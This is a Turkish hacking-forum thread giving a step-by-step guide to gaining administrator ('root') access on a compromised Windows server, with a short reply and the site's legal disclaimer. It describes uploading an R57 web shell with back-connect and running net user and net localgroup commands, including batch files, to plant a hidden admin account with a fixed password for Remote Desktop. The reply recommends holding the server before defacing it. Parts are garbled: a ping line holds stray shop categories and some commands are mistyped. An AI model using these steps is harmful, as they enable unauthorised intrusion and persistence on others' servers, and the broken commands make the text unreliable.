Windows Server ROOT Olmak! Root Döküman Beyin Fırtınası!

JohnDoe

Kıdemli Üye
29 Eyl 2013
2,710
6
Teşkilat
Merhabalar,

Değerli arkadaşlarım bilindiği gibi bir çok arkadaşımız server üzerinde root olmayı açıkcası pek bilmiyor. Bu konuya dayalı olarak bir konu açmak ve sizlerle Windows sunucular üzerinde root olmayı anlatmaya karar verdim. Döküman tamamen tarafıma aittir. Sizlere en iyi şekilde Windows sunucular üzerinde root olmayı göstereceğim.

Şimdi öncelikle bize bir adet shell gerekmekte ben temsilen örnekleme yaparak ilerleyeceğim.

Windows Server'e R57 shell atarak BackConnect ile baglandık.

Putty ile server'a -İPT 54321 /add komutunu" verirsek, server'a İPT kullanıcısını (user'ını) ekler.

"net localgorup administrators İPT /add" komutunu verincede İPT kullanıcısı admin (root) yetkisini alır.

Yanlız şunu'da belirtmek istiyorum'ki her Server bu kadar kolay değildir. Zor olan'da var bir çoğumuza denk gelmiştir. Örnek vermek gerekiyorsa bana denk geldi! :}

Bazı bilinen Serverler'de komut çalıştırmamız imkansızdır. Sadece kullanılabilen komut /dir/ komutu çalışıyorsa hemen bir text editörü oluşturarak içerisine alttaki kodları uygulamaya başlayalım.

Kod:
@echo
net user İPT turkhackteamkaan /add
end

Bu işlemi tamamladık'dan sonra İPT.bat olarak kayıt ediyoruz. Bağlantımızı açarak Start İP.bat yazıyor ve komut ekleniyor. Bir adet text daha oluşturuyoruz ve içerisine alttaki kodu ekliyor İPT2.bat olarak kayıt ediyoruz.

Kod:
@echo
net localgroup administrator İPT /add
end

Start İP2.bat yazıyor ve komutu'da ekleyerek tamamlıyoruz. Şimdi diğer aşamaya geçelim hemen, Dosyalarınız hangi dizindeyse O dizinde çalıştırmamız gerekiyor. Aksi halde çalışmayacak ve hata verecektir.

Şimdi diğer aşamaya geçiyoruz. Local'den Başlat -> Çalıştır -> CMD yazıyoruz ve;

Kod:
ping Target: Baby, Bedding, Furniture, Electronics, Clothing, ...

IP adresimizi alıyoruz.

Uzak Masaüstü Bağlantımız;

Kod:
IP :
User : İPT
Password : turkhackteamkaan

Bağlantı kurduysak tamamdır. Hadi geçmiş olsun ROOT olabildik! İyi günler de kullanmanız dileğiyle. :RpS_cool:

by_pirate

Üye
29 Kas 2008
84
0
Güzel anlatım.

Sunucuya shell attığımızda hemen indeximizi atmak yerine altına üstüne getirmek lazım serveri

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.